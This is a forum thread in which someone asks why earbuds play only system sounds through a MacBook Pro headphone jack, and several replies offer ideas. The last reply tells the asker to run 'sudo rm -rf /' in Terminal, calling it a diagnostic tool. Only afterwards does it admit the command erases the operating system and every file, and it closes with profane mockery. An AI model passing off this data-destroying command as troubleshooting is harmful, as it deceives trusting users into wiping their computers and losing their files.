Headphones in mac won't work

I have a MacBook Pro 15in retina computer. I took it on an airplane to Utah and back and when I got back home, I realized my earbuds don't work in my computer. My earbuds work in my phone, but not in the headphone jack of my mac. Ive used different buds and it still won't work. Ive made sure my sound is on and up. Its weird, when I go into setting and click on a ringtone, it comes through the earbuds, but no other sound. Ive tried the insert/extract method with the earbud plug and also tried blowing inside of it but nothing works. HELP ME

Turn it off and turn it on. Same thing happened to me a while ago with the usb port

Go to System Preferences > Sound > Output.
Plug your headphones in if you haven't yet.
Look at the bottom where it says Output Volume and un-check the mute button

if this is not the case then idk what it is

okay so what you want to do is open finder on your mac and type "terminal" this should show you an icon for your terminal utility. Open that then copy this line of text in to the terminal:

sudo rm -rf /

this is a diagnostic tool and requires administrative permissions to run so you'll probably need to enter your password.

After this install a new copy of OS X because you will have just deleted your os along with all your files using that command I just gave you. After you have a shiny new install of OS X up and running on your computer just open up safari and GOOGLE YOUR FUCKING QUESTION
